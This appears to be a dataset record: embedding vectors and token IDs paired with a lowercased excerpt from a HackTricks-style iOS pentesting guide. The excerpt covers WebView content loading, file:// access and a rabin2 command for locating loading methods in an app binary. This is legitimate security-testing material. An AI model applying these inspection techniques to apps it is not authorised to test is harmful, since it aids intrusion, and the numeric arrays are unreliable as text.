[ -0.0721454843878746, -0.03772622346878052, -0.1609334498643875, 0.762092649936676, -0.39730021357536316, -0.16977381706237793, 0.03649850934743881, -0.3240087032318115, 0.7304128408432007, 0.6984718441963196, -0.3438931405544281, 0.017407895997166634, 0.31654855608940125, -0.054248563945293427, -0.2384386658668518, -0.37002116441726685, -0.9314210414886475, -0.5425915718078613, -1.2668617963790894, -0.2975507080554962, -0.27057433128356934, 0.556411862373352, -1.4760222434997559, -0.9991376996040344, -0.2442632019519806, 0.8680190443992615, 0.9225671887397766, -0.16146951913833618, 0.5532439351081848, 0.7806795835494995, 0.10632437467575073, -0.09473397582769394, -0.32084497809410095, -0.3019907474517822, 0.08137168735265732, -0.21421712636947632, 0.6683765053749084, -0.46708711981773376, 0.1905795782804489, -0.5297920107841492, 0.17776727676391602, -0.5008192658424377, 0.07870253920555115, -0.23802034556865692, -0.19220873713493347, -0.44431543350219727, 1.1271735429763794, -0.6556116938591003, 0.44544926285743713, -0.2832449674606323, 0.18509475886821747, 0.14118124544620514, -0.24587954580783844, 0.01798083446919918, -0.04012612625956535, 0.11464972048997879, -0.21070992946624756, -0.5275275707244873, -0.36205729842185974, 0.6358643174171448, 0.0640920102596283, 0.28868287801742554, 0.8537551164627075, -1.0480400323867798, -0.14254878461360931, 0.11229193955659866, -0.008058737963438034, -0.025667378678917885, -0.2931165099143982, -0.09161703288555145, -0.36099541187286377, 0.7926066517829895, -0.46013668179512024, -0.5532925724983215, -0.6538501381874084, 0.12353726476430893, 0.005952772684395313, -0.12436174601316452, 0.30201709270477295, 0.539299488067627, 0.03169664740562439, 0.8054394721984863, 0.3326604664325714, 0.08579500019550323, -0.11032157391309738, -0.2869199812412262, 0.01466187834739685, 0.9021598696708679, -0.4787740707397461, 0.15768782794475555, 0.4250083267688751, 0.4065210521221161, -0.8407726287841797, -0.7404497265815735, -0.1537153720855713, 0.660049557685852, -0.3971828818321228, 0.15641503036022186, 0.3087242543697357, -0.06924550980329514, 0.879614531993866, 0.5129477977752686, 0.17172442376613617, 0.6829068660736084, -0.3476332426071167, 0.5506405830383301, -0.021224860101938248, -0.4358164072036743, -0.252273827791214, -0.5402430891990662, 0.4189783036708832, -0.4449082612991333, 0.46729838848114014, -0.999748170375824, 0.14103247225284576, 0.48286452889442444, -0.07754287868738174, -0.09004580974578857, -0.19697967171669006, 0.8112966418266296, -0.16110488772392273, -0.08078360557556152, 0.31920936703681946, 0.046343844383955, 0.6907889246940613, 0.18758593499660492, -0.15776866674423218, 0.8841965794563293, -0.5035838484764099, -0.2790496349334717, -0.24331922829151154, -0.5868252515792847, -0.07495004683732986, 0.5212865471839905, -0.2830554246902466, 0.43916386365890503, -0.0810379907488823, 0.4245828688144684, 0.7102997303009033, -0.9580512046813965, -0.049162108451128006, 0.30308300256729126, 0.10830339044332504, 1.462264060974121, 0.983812153339386, 0.25499388575553894, -0.7350990176200867, -0.8458201289176941, -0.4098816514015198, -0.08398006856441498, -0.5805273652076721, -0.3377552926540375, 0.3705216646194458, -0.6120249629020691, -0.7948766350746155, 0.5327284932136536, -0.2695249021053314, -0.17594432830810547, -0.9557769894599915, -0.27488717436790466, -0.21208247542381287, 0.8800123929977417, -0.2058224081993103, 0.38796505331993103, -0.8359180688858032, 0.03937659040093422, -0.615297794342041, -0.5865209698677063, -0.09210966527462006, 0.4194461703300476, 0.24553366005420685, 0.06757639348506927, -0.13638803362846375, 0.06712299585342407, 1.2717902660369873, 1.1379132270812988, 0.3542456030845642, 0.11783070862293243, 0.5826498866081238, 0.6702770590782166, -0.19543224573135376, 0.14767572283744812, 0.33329856395721436, 0.7457005381584167, -0.07146316021680832, 0.5095593333244324, -0.7728121280670166, -0.8213052749633789, -0.2676820158958435, -0.21452182531356812, -0.1817035973072052, 0.3050808012485504, 0.037342462688684464, 0.5584831237792969, 0.7956527471542358, 0.24675831198692322, -0.29589375853538513, -0.006802247371524572, -0.28906354308128357, -1.58176589012146, -0.6980180144309998, -0.09150810539722443, -0.5090004205703735, 0.5624812841415405, -0.016988977789878845, -0.20950281620025635, 0.5907568335533142, 0.4937123656272888, -0.4057169258594513, 0.4463866651058197, 0.7101473212242126, 0.2151939421892166, -0.8574047684669495, 0.610832929611206, 0.2705186903476715, -0.4230676293373108, -0.8993697762489319, 0.8154771327972412, -0.23040294647216797, 0.26793572306632996, 0.4679020047187805, 0.6228415369987488, 0.5270818471908569, 0.5210462212562561, 0.05864068865776062, -0.3703569769859314, 0.283705472946167, 0.4289909899234772, -0.5350137948989868, 0.24321112036705017, 0.5318705439567566, 0.4505581259727478, 0.29861533641815186, 0.7777134776115417, 0.7594203948974609, -0.3658231496810913, 0.17994767427444458, 0.44884875416755676, 0.47221311926841736, 0.2588575482368469, 0.09558690339326859, 0.8504254221916199, 1.0764343738555908, 0.2808254063129425, 0.16614803671836853, -0.21504996716976166, -0.16153870522975922, -0.3294212222099304, 0.5051363110542297, 0.19115369021892548, 0.3286147713661194, 0.7452079057693481, 0.897786557674408, -0.2570748031139374, -0.4001982808113098, -0.38732343912124634, 0.854934573173523, 1.0777980089187622, -0.778860867023468, -1.032405972480774, -0.08253443241119385, 0.4384247958660126, -0.3146389424800873, -0.2501819133758545, 0.24262066185474396, 0.7479797005653381, -0.37863215804100037, 0.38337939977645874, -0.2882871627807617, -1.1278800964355469, -0.7117556929588318, -0.513757050037384, -0.7077469229698181, -0.4578622877597809, -0.786832332611084, -0.5112674832344055, 0.5486180782318115, -0.310064435005188, 0.39596426486968994, -0.052227601408958435, -0.8188028335571289, -0.11201925575733185, -0.16758579015731812, 1.1286700963974, 0.0371691919863224, -0.4316502809524536, -1.149832010269165, 0.2871740162372589, 0.04860394448041916, 1.2424992322921753, -0.01639559306204319, -0.3435107469558716, -0.29326891899108887, -0.3296210467815399, -0.06542272120714188, -0.3936721682548523, 0.49993613362312317, 0.44265228509902954, -0.04352312907576561, -0.2558959722518921, 0.34012746810913086, -0.0051679606549441814, 0.45048731565475464, 0.1260116547346115, -0.42670875787734985, 1.206457257270813, -0.4435443878173828, -0.083338163793087, 0.2959196865558624, -0.049166999757289886, -0.885508120059967, 0.6139273047447205, 0.21321167051792145, 0.252742201089859, -0.48711851239204407, 0.5655871033668518, 0.520193874835968, 0.42563337087631226, -0.03555100038647652, 0.192377507686615, -0.1707807034254074, -0.5547578930854797, 0.20403845608234406, -0.27264922857284546, -0.4534488022327423, 0.23035882413387299, 0.1831553876399994, -1.2580287456512451, 0.04945380240678787, -0.21245384216308594, -0.3555780053138733, -0.5552470088005066, -0.5077598690986633, 0.6827308535575867, 0.23139086365699768, 0.023396417498588562, 0.27714452147483826, -0.23269613087177277, 0.48627400398254395, -0.19824576377868652, 0.39872121810913086, -0.5239246487617493, 0.8764885663986206, 0.4550594389438629, -0.5274297595024109, 0.6503913402557373, -0.003225712338462472, -0.013449341058731079, 0.5548940300941467, 0.1164432242512703, -0.23957963287830353, -0.24863296747207642, 0.5026922821998596, 0.17751379311084747, -0.12807011604309082, 0.5146933197975159, -0.41881752014160156, -0.052028026431798935, -0.09550677984952927, -0.11007997393608093, 0.33744481205940247, -0.40849098563194275, 0.49582603573799133, 0.33301785588264465, -0.26711443066596985, -0.3017269968986511, 0.41249287128448486, 0.21160492300987244, 0.549006462097168, -0.44987228512763977, 1.1552774906158447, 0.06549091637134552, 0.2264469414949417, 0.5948770642280579, -0.2331773042678833, -0.38467422127723694, 0.8491402268409729, 0.1598520278930664, 0.4000217318534851, -0.3231504559516907, -0.022362083196640015, -0.07386943697929382, -0.08503293246030807, 0.6929163336753845, 0.2383398413658142, 0.12345830351114273, -0.6127010583877563, 0.07691819220781326, -0.19226594269275665, -0.7010732889175415, 0.29705366492271423, 0.08150584250688553, 0.16137492656707764, -0.40083202719688416, -0.3349824547767639, -0.6218757033348083, 0.6388850808143616, 0.7890454530715942, 1.0332485437393188, 0.17984507977962494, 0.5076388120651245, 0.16250984370708466, 0.09684602916240692, -0.030363313853740692, -0.5419884920120239, 0.021321812644600868, -0.16245070099830627, 0.7625483870506287, -0.007732043042778969, 0.04359808191657066, 0.0588887482881546, -0.2176327258348465, -0.24248625338077545, -0.3157900273799896, 0.024780916050076485, 0.2090500295162201, -0.6676098108291626, -0.6996443867683411, -0.21498049795627594, -0.03248527646064758, -0.6137333512306213, -0.2644515931606293, 0.27763450145721436, 1.0824215412139893, 0.4457501173019409, -0.7735183238983154, 0.2934334874153137, -0.9753361344337463, 0.4523056447505951, 0.15041851997375488, -0.020180702209472656, -0.22728243470191956, -0.8199261426925659, -0.4818784296512604, -0.5356318354606628, 0.13729238510131836, 0.8449835777282715, 0.056356362998485565, 0.3909212350845337, -0.979108989238739, -0.2984394133090973, 0.6540102958679199, -0.40108153223991394, -0.43523159623146057, -0.3923693001270294, -0.23568689823150635, 0.2708262801170349, 0.7252832055091858, -0.5824871063232422, -0.4774535298347473, 0.6035290360450745, -0.7059680819511414, 0.8990902900695801, -0.8236840963363647, 0.14622165262699127, -0.30339762568473816, -0.344027042388916, 0.29685458540916443, -0.04752526432275772, -0.6161413788795471, -0.41923055052757263, 0.04031887650489807, 0.625850260257721, -0.1404556930065155, -0.7126904129981995, 1.0055761337280273, -0.13620010018348694, -0.16594479978084564, 0.20625030994415283, 0.15106387436389923, -0.14636047184467316, -0.4416499733924866, -0.07153941690921783, -0.5227493047714233, 0.6848878264427185, -0.32787445187568665, 0.45935145020484924, 0.14792482554912567, -0.007838990539312363, 0.09752294421195984, -0.2287663370370865, 0.27149078249931335, -0.09765622764825821, 0.2885041832923889, -0.8543038964271545, -0.71688312292099, -0.11017835885286331, 0.03526904433965683, 0.12005234509706497, 0.16234272718429565, 0.16729657351970673, -0.5978875756263733, -0.260062038898468, -0.11996998637914658, -0.569248616695404, -1.126528024673462, -0.06232704222202301, 0.11733713746070862, 0.49404504895210266, -0.2726048231124878, 0.8327489495277405, -0.44349461793899536, -0.8296814560890198, -0.08195734769105911, -0.3193681538105011, 0.27771633863449097, -0.8253998160362244, 0.0673758015036583, -0.9331731200218201, -0.2364329844713211, 0.30864229798316956, 0.6119192838668823, -0.1264442503452301, 0.21735045313835144, 0.15678182244300842, 0.3674902021884918, 0.06595633178949356, -0.11808424443006516, -0.17762359976768494, 0.814927875995636, 0.31823718547821045, -0.8398878574371338, -0.4130944013595581, 0.3387755751609802, -0.04769120737910271, 0.4820408523082733, -0.05500408262014389, -0.45085784792900085, -1.0762407779693604, -1.2154487371444702, 0.1092602089047432, -0.1593274027109146, 0.14363153278827667, -0.46943044662475586, 0.22403669357299805, -0.19237670302391052, 0.41697394847869873, -0.3394485414028168, -1.1473621129989624, -0.1468925029039383, -0.566140353679657, -0.14552374184131622, -0.4050073027610779, 0.5205754637718201, -0.13711506128311157, -0.33780837059020996, 0.022763747721910477, 0.7476261854171753, 0.28294602036476135, 0.10426510125398636, 0.16811057925224304, -0.1460966169834137, 0.7404924035072327, -0.10800284892320633, -0.2821946442127228, -0.46541136503219604, 0.14783427119255066, -0.06300684064626694, -0.31617143750190735, 0.3483870327472687, -0.30515292286872864, 0.6428222060203552, -0.6183940172195435, -0.08210580796003342, 0.2998301684856415, -0.26498737931251526, -0.07399877905845642, -0.26245296001434326, 0.8151240944862366, -0.6689873933792114, -0.01227600872516632, 0.03055059164762497, 0.9286155104637146, 0.3739064037799835, -0.22684286534786224, -1.0289374589920044, 0.26211678981781006, -0.7347056865692139, -1.0919599533081055, 0.346454381942749, 0.020365947857499123, -0.37991422414779663, -0.22879904508590698, -0.01298139151185751, 0.4025220274925232, -0.2710142433643341, 0.8466530442237854, 0.8658100962638855, 0.25508660078048706, 0.2953694760799408, -0.2771456241607666, 0.5450610518455505, 0.31903162598609924, 0.471569687128067, 0.40593859553337097, -0.6734371781349182, -0.25094524025917053, 0.17869000136852264, -0.5135422348976135, 0.24094782769680023, -0.7160680890083313, -0.37314388155937195, 0.3101602792739868, 0.34187519550323486, 1.0417591333389282, -0.3121568262577057, -1.22102952003479, 0.2959587872028351, 0.4811839461326599, -0.033716343343257904, -0.2620638906955719, 0.4256628155708313, 0.5821647644042969, 0.09464707225561142, 0.027924759313464165, -0.15132322907447815, -0.6781520843505859, -0.057423193007707596, 1.033642292022705, -0.13057219982147217, -1.0582315921783447, 0.8632564544677734, 0.8072635531425476, -1.0007812976837158, -0.24437373876571655, -0.4285259246826172, -0.4648330807685852, -0.15035118162631989, -0.5001299381256104, -0.29661017656326294, 0.7995052337646484, 0.6090261936187744, 0.29331791400909424, 0.7278737425804138, -0.06285630911588669, 0.6279029846191406, -0.40469890832901, 0.22279219329357147, -0.002072493312880397, -0.01250862143933773, 0.658126175403595, -0.6202225685119629, -0.28788766264915466, -0.689428448677063, 0.1359986960887909, 0.4457347095012665, -0.23893092572689056, 1.1588371992111206, 0.02414810098707676, -0.07383091747760773, 0.16032971441745758, -0.1547314077615738, 0.20766285061836243, -0.17209531366825104, -0.3434782922267914, 0.8951864838600159, 0.3730009198188782, -0.780912458896637, -0.29550451040267944, 0.3631214499473572, 0.39421406388282776, 0.7602396011352539, -0.44731688499450684, -0.15885281562805176, -0.0444413423538208, 0.09412853419780731, -0.3681209683418274, -0.33661776781082153, -1.2426729202270508, -1.019853115081787, -0.36134764552116394, 0.2840525507926941, -0.1617041677236557, -0.1372612863779068, 0.35253623127937317, -0.0878506749868393, -0.030399074777960777, 0.05327651649713516, -0.30223920941352844, -0.04493394494056702, 0.1600436568260193, -0.5066593885421753, 0.5351588726043701, -0.8179648518562317, -0.8658233880996704, -0.4007894694805145, -0.16743944585323334, -0.2691343426704407, -0.8303589820861816, -0.5824733972549438, 0.22694063186645508, -0.9627376198768616, 0.7544241547584534, -0.6376222968101501, 0.23870731890201569, -0.423149973154068, -0.2619863450527191, 0.1921202689409256, 0.5962190628051758, -0.272609144449234, 0.19752834737300873, 0.35539236664772034, 0.09430485963821411, 0.20143277943134308, -0.4897567629814148, 0.20409375429153442, -0.5925443172454834, 0.25247660279273987, 0.10740426182746887, 0.5580762028694153, -0.5147393941879272, 0.047469139099121094, -0.12645894289016724, -0.19534066319465637, -0.2768133282661438, -0.5187209844589233, -0.19374388456344604, 0.09440751373767853, -0.08976469188928604, -0.20110741257667542, 0.7412413954734802, 0.08103230595588684, 0.773802638053894, -1.0018534660339355, 0.40299662947654724, 0.9009171724319458, -0.20138932764530182, -0.03292304649949074, 0.6151418089866638, 1.0784488916397095, -0.3070240616798401, 0.2588804066181183, 0.21448831260204315, -0.3494216203689575, 0.9252570867538452, -0.22727985680103302, -0.09340358525514603, -0.3115485608577728, -0.11023004353046417, 0.23754142224788666, 0.3477860987186432, 0.6798664927482605, -0.448209285736084, -0.0939018502831459, -0.2551819086074829, -0.6552143692970276, -0.3176116347312927, -0.6061124205589294, -0.16006837785243988, -0.07304692268371582, -0.3345900774002075, -0.4134495258331299, -0.15797246992588043, -0.5490334033966064, 0.4750056564807892, -0.2882826030254364, -0.3224809467792511, -0.026384083554148674, -0.2820966839790344, 0.20114648342132568, 0.6418254971504211, -1.0007867813110352, -0.44736361503601074, -0.061074115335941315, 0.3801659047603607, -0.53449547290802, -1.6017390489578247, 0.10852573066949844, 0.19833144545555115, 0.3081841468811035, -0.10476122051477432, -0.7459922432899475, 0.6024090647697449, 0.5013840198516846, -0.053996093571186066, 0.10519334673881531, -0.036149125546216965, -0.36403366923332214, 0.0698443129658699, -0.587178111076355, 0.2409512847661972, -0.5364343523979187, 0.12580321729183197, 0.44347986578941345, -0.415088415145874, -0.34456703066825867, 0.36738547682762146, 0.07757995277643204, -0.4075298607349396, 0.8192904591560364, 0.3479028642177582, 0.357122004032135, -0.7212363481521606, -0.1431707739830017, -0.027707956731319427, 0.47929999232292175, 0.4242611825466156, 0.16924238204956055, -0.08847399801015854, 0.220607191324234, 0.7174028158187866, -0.594603419303894, -0.4056520164012909, 0.6933653354644775, 0.07751759886741638, -0.5676193237304688, 0.06729282438755035, -0.6443696618080139, 0.26727259159088135, 0.018338408321142197, -0.38052621483802795, 0.0697956383228302, -0.08887489140033722, -0.23222771286964417, 0.3183354437351227, 0.06197374314069748, 0.9959642887115479, -0.8668588995933533, 0.8477465510368347, -0.1840650588274002, -0.09866367280483246, 0.2588820159435272, 0.2866840362548828, -0.3830467164516449, 0.5674541592597961, 0.9719228148460388, 0.06105298176407814, -0.0567178949713707, 0.46639493107795715, -0.6149474382400513, 0.0662216991186142, 0.574464738368988, -0.24581605195999146, -0.5212674736976624, 0.20937633514404297, -0.05934368446469307, -0.5744300484657288, -1.1414622068405151, 0.3611537218093872, 0.14598672091960907, -0.2533404529094696, 0.8096666932106018, -0.22845393419265747, -0.17153383791446686, -0.08941598236560822, 0.813305675983429, -0.5237293839454651, 0.4129839837551117, 0.3487388789653778, -0.14479906857013702, -0.48374977707862854, 0.6039625406265259, -0.018882451578974724, 0.9582455158233643, 0.3839617669582367, 1.0039013624191284, -0.4590972065925598, 0.9258228540420532, 0.15199217200279236, -0.21255658566951752, -0.8376535773277283, -0.14475798606872559, -0.23247213661670685, -0.5151410102844238, 0.6145186424255371, -0.2574903070926666, 0.5349184274673462, -0.1033109799027443, -0.27563387155532837, -0.5294645428657532, 0.23646223545074463, -0.7259695529937744, -0.23287205398082733, 0.2809702754020691, -0.11761268228292465, -0.262124240398407, 0.22957997024059296, -0.09906705468893051, 0.2670142352581024, 0.9093893766403198, -0.6083954572677612, -0.7956153154373169, -0.8773861527442932, -0.1800963580608368, -0.31799402832984924, 1.2839946746826172, -0.5248448252677917, -0.1081850603222847, -0.3410015106201172, -0.9021116495132446, -0.24868609011173248, 0.005982327274978161, -0.3380853533744812, -0.7495277523994446, -0.11481235176324844, 0.2914966642856598, 0.47777676582336426, 0.5757642984390259, -0.33424100279808044, -0.060715071856975555, 0.49375784397125244, 0.8277938961982727, -0.04364628344774246, 0.6923860311508179, 0.09618827700614929, 0.12057903409004211, 0.1487155556678772, -0.5427606105804443, 0.743745744228363, -0.0747741311788559, 0.13977055251598358, -0.37234723567962646, 0.16279003024101257, -0.4693663716316223, -0.32593753933906555, 0.2396412193775177, 0.30763229727745056, -0.18988022208213806, -0.06939230859279633, -1.3954716920852661, 0.6139917969703674, -1.286737322807312, 0.05400705337524414, 0.03485630452632904, 0.27867045998573303, 0.16598328948020935, 0.5017698407173157, 0.6818779706954956, -0.917184591293335, 4.221337795257568, 0.7691640853881836, -0.004907747730612755, 0.18442392349243164, 0.26771804690361023, 0.7756934762001038, 1.2780510187149048, -0.524256706237793, 0.3142111003398895, -0.49090659618377686, -0.09341520816087723, 0.5377037525177002, 0.8006995916366577, 0.04077461361885071, 0.7140564322471619, 0.5245150327682495, -0.5331712961196899, -0.3097006678581238, 0.18196554481983185, -1.0406105518341064, -0.8489996790885925, 0.026788894087076187, -0.4654315412044525, 1.1086175441741943, 0.6468451023101807, -0.31269916892051697, 0.2254343181848526, -1.127964973449707, -0.22895681858062744, -0.7430694103240967, -0.22967292368412018, -0.627235472202301, -0.20333872735500336, -0.6404420733451843, -0.5868988633155823, -0.06751125305891037, 0.3759704530239105, -0.9355893135070801, -0.5849170684814453, 0.3741184175014496, -0.12030798196792603, -0.28029128909111023, 0.34930577874183655, -0.38889238238334656, 0.3886200189590454, 0.590530276298523, -0.8102431893348694, 0.44040659070014954, 0.4084886312484741, -1.0000076293945312, 0.3287111520767212, -0.246087446808815, 0.788061797618866, -0.39488136768341064, -0.32100754976272583, 0.1895250380039215, 0.4005530774593353, -0.8052384853363037, 0.6873559951782227, -0.09351038932800293, 0.346995085477829, -0.8155370950698853, 0.4246436655521393, -0.0344599187374115, -0.9356384873390198, 0.41479983925819397, -0.37232449650764465, 0.5712977051734924, -0.002867918461561203, -0.16610543429851532, -0.43974417448043823, -0.2029476761817932, -0.27127721905708313, -0.18334946036338806, 1.4378910064697266, -0.30971863865852356, -0.4204447269439697, 0.23660911619663239, 0.5562536716461182, -0.9973183870315552, -0.1100866049528122, -0.9130539298057556, -0.8221468925476074, 0.4561167061328888, 0.8976107835769653, 1.102164626121521, -0.5508943200111389, -0.810933530330658, 0.35670700669288635, 0.964740514755249, 0.44214531779289246, 0.4950922131538391, -0.47110363841056824, 0.48265647888183594, 0.007507170084863901 ]
[ 1024, 1005, 1010, 21318, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 24471, 2140, 1024, 1005, 1010, 21318, 1012, 5227, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 1065, 1010, 2006, 9006, 10814, 2618, 1024, 3853, 1006, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2589, 2005, 21318, 8545, 2497, 8584, 999, 1005, 1007, 1025, 1065, 1065, 1007, 1025, 27885, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 1059, 2243, 8545, 2497, 8584, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 1059, 2243, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818, 1024, 1005, 1010, 1059, 2243, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 24471, 2140, 1024, 1005, 1010, 1059, 2243, 1012, 24471, 2140, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 1065, 1010, 2006, 9006, 10814, 2618, 1024, 3853, 1006, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2589, 2005, 1059, 2243, 8545, 2497, 8584, 999, 1005, 1007, 1025, 1065, 1065, 1007, 1025, 27885, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 16420, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818, 1024, 1005, 1010, 16420, 1007, 1025, 1065, 1010, 2006, 9006, 10814, 2618, 1024, 3853, 1006, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2589, 2005, 16420, 3736, 14971, 12848, 2666, 16526, 12162, 26611, 999, 1005, 1007, 1025, 1065, 1065, 1007, 1025, 27885, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 1059, 2243, 8545, 2497, 8584, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 1059, 2243, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818, 1024, 1005, 1010, 1059, 2243, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 9262, 22483, 8189, 23242, 1024, 1005, 1010, 1059, 2243, 1012, 9563, 1006, 1007, 1012, 18394, 1006, 1007, 1012, 9262, 22483, 8189, 23242, 1006, 1007, 1007, 1025, 1065, 1065, 1007, 1025, 27885, 3501, 2278, 1012, 5454, 1006, 27885, 3501, 2278, 1012, 4280, 1031, 1005, 1059, 2243, 8545, 2497, 8584, 1005, 1033, 1010, 1063, 2006, 18900, 2818, 1024, 3853, 1006, 1059, 2243, 1007, 1063, 10122, 1012, 8833, 1006, 1005, 2006, 18900, 2818, 1024, 1005, 1010, 1059, 2243, 1007, 1025, 10122, 1012, 8833, 1006, 1005, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1024, 1005, 1010, 1059, 2243, 1012, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 1065, 1065, 1007, 1025, 7170, 2009, 2007, 1024, 10424, 8524, 1011, 1057, 4012, 1012, 27280, 7011, 4014, 5397, 1012, 2073, 6491, 2100, 12618, 9333, 2121, 1011, 1048, 4773, 8584, 2015, 1035, 7742, 1012, 1046, 3385, 18900, 2818, 1024, 1026, 1059, 2243, 8545, 2497, 8584, 1024, 1014, 2595, 16068, 2692, 2620, 2497, 12521, 8889, 1025, 4853, 1027, 1006, 1014, 1014, 1025, 13710, 4464, 2509, 1007, 1025, 6741, 1027, 1026, 10250, 4710, 2121, 1024, 1014, 2595, 2487, 2278, 20958, 22025, 2546, 11387, 1028, 1028, 2038, 2239, 2135, 3366, 23887, 8663, 6528, 2102, 1024, 6270, 8545, 2497, 8584, 8778, 8304, 3366, 26061, 2140, 12398, 11683 ]
hack_tricks
435.txt
3
are available that are being interpreted in a webview on ios, for example : http ( s ) : / / file : / / tel : / / webviews can load remote content from an endpoint, but they can also load local content from the app data directory. if the local content is loaded, the user shouldn't be able to influence the filename or the path used to load the file, and users shouldn't be able to edit the loaded file. webview content loaduiwebview : it can use deprecated methods loadhtmlstring : baseurl : or loaddata : mimetype : textencodingname : baseurl : to load content. wkwebview : it can use the methods loadhtmlstring : baseurl : or loaddata : mimetype : textencodingname : baseurl : to load local html files and loadrequest : for web content. typically, the local files are loaded in combination with methods including, among others : pathforresource : oftype :, urlforresource : withextension : or init ( contentsof : encoding : ). in addition, you should also verify if the app is using the method loadfileurl : allowingreadaccesstourl :. its first parameter is url and contains the url to be loaded in the webview, its second parameter allowingreadaccesstourl may contain a single file or a directory. if containing a single file, that file will be available to the webview. however, if it contains a directory, all files on that directory will be made available to the webview. therefore, it is worth inspecting this and in case it is a directory, verifying that no sensitive data can be found inside it. if you have the source code you can search for those methods. having the compiled binary you can also search for these methods : $ rabin2 - zz. / wheresmybrowser | grep - i " loadhtmlstring " 231 0x0002df6c 24 ( 4. _ _ text. _ _ objc _ methname ) ascii loadhtmlstring : baseurl : file accessuiwebview : the file : / / scheme is always enabled. file access from file : / / urls is always enabled. universal access from file : / / urls is
[ 0.08776340633630753, 0.00429206108674407, -0.08646350353956223, 0.40159016847610474, -0.18265056610107422, 0.32802942395210266, 0.06766313314437866, -0.40574026107788086, 0.9166754484176636, 1.007278323173523, 0.2759256064891815, 0.10612316429615021, 0.7693784236907959, -0.44511696696281433, -0.3260144591331482, -0.48331257700920105, -0.1502460241317749, 0.026258444413542747, -0.24480408430099487, -0.1288304179906845, 0.6815908551216125, 0.5450517535209656, -0.6099963188171387, -1.2699099779129028, -0.25982192158699036, 0.14900095760822296, 0.421025812625885, 0.24324095249176025, 0.8376442790031433, 1.1919664144515991, -0.19158248603343964, 0.12468920648097992, -0.17038960754871368, 0.004118872340768576, -0.20634445548057556, -0.19363008439540863, 0.8483532667160034, 0.25016990303993225, -0.09294280409812927, -1.0062283277511597, 0.09727557748556137, -0.10358171910047531, 0.34364810585975647, -0.8213812112808228, -0.5178062319755554, -0.3062865138053894, 0.6996394395828247, 0.04103431478142738, -0.10015836358070374, 0.27951380610466003, 0.18791449069976807, 0.5263238549232483, -0.29001811146736145, -0.23675711452960968, 0.5437552332878113, 0.12473267316818237, -0.1454489827156067, -0.33055344223976135, -0.3975175619125366, 0.6292802095413208, -0.3289029598236084, 0.3636555075645447, 0.787858784198761, -0.14994831383228302, 0.1115022525191307, 0.931837797164917, -0.474945992231369, -0.4842672348022461, -0.2338109165430069, -0.5062276124954224, -0.22526690363883972, 0.4552142322063446, -0.8954546451568604, -0.49902626872062683, -0.19126810133457184, 0.038296714425086975, -0.8800610899925232, 0.2903587818145752, 0.18162518739700317, 0.4982176721096039, -0.4387160837650299, 0.39156869053840637, 0.5630807280540466, -0.3115736246109009, -0.30352529883384705, -0.6173158288002014, 0.6946141123771667, 0.3187955319881439, 0.06771231442689896, 0.43664735555648804, -0.4915326237678528, 0.48395732045173645, -1.3049339056015015, -0.5091337561607361, 0.6897298693656921, 0.7428693175315857, -0.10331780463457108, 0.014842181466519833, -0.6221516728401184, -0.40903040766716003, 0.04284817352890968, 1.5284266471862793, -0.01268754806369543, 0.4528730511665344, -0.5648188591003418, 0.2003161758184433, -0.031447168439626694, -0.17995649576187134, -0.842890202999115, -0.3147280514240265, 0.03852808475494385, -0.7164914608001709, 0.32817691564559937, -0.8657851815223694, 0.6799255609512329, 0.11843361705541611, 0.25230109691619873, 0.2996131181716919, 0.14839591085910797, 0.5156230330467224, 0.3838970363140106, 0.17760680615901947, 0.14809834957122803, -0.18585583567619324, 0.16291965544223785, 0.11810183525085449, -0.059160783886909485, 0.6400052905082703, -0.4223707318305969, -0.0878932848572731, 0.20219402015209198, -0.06251869350671768, -0.2613784670829773, 0.6446284055709839, -0.760409414768219, -0.06498648226261139, 0.14648191630840302, -0.0981193482875824, 0.39142513275146484, -0.5124087333679199, 0.04191859811544418, 0.7301438450813293, 0.02036573365330696, 0.9091325402259827, -0.11705142259597778, 0.3460766077041626, -1.0465126037597656, -0.11176931113004684, -0.7428185343742371, 0.4592030346393585, 0.24507056176662445, 0.5442540645599365, 0.8857621550559998, -0.49294513463974, -0.6625628471374512, 0.0003463984467089176, -0.4798668920993805, 0.5576961040496826, 0.38610929250717163, -0.04620063304901123, -0.8398264050483704, 1.2097281217575073, 0.017948029562830925, 0.3099866509437561, -0.9248776435852051, 0.3594170808792114, -0.387940913438797, -0.40889105200767517, -0.39996132254600525, 0.2502143681049347, 0.14643552899360657, 0.44873401522636414, 0.1480219066143036, 0.28581300377845764, 1.2895818948745728, 0.6833138465881348, -0.36712753772735596, -0.26182129979133606, 0.26304590702056885, 0.5397864580154419, -0.1430782824754715, 0.26142433285713196, 1.2587881088256836, 0.4030712842941284, -0.8415288329124451, 0.26148155331611633, -0.31096208095550537, -0.05282502993941307, -0.3266502022743225, -0.04198070988059044, -0.3645527958869934, 0.429061621427536, -0.4738186001777649, 0.13915430009365082, 0.32312265038490295, -0.006656868848949671, -1.3482311964035034, -0.7274117469787598, -0.13641268014907837, -1.282657265663147, -0.4970674216747284, -0.36504223942756653, 0.05737892910838127, 0.37126630544662476, -0.27791956067085266, -0.3082045316696167, 0.8982334136962891, 0.45968690514564514, 0.016293812543153763, 0.9526952505111694, 1.292124629020691, -0.37467509508132935, -0.5826643705368042, 0.1120694950222969, 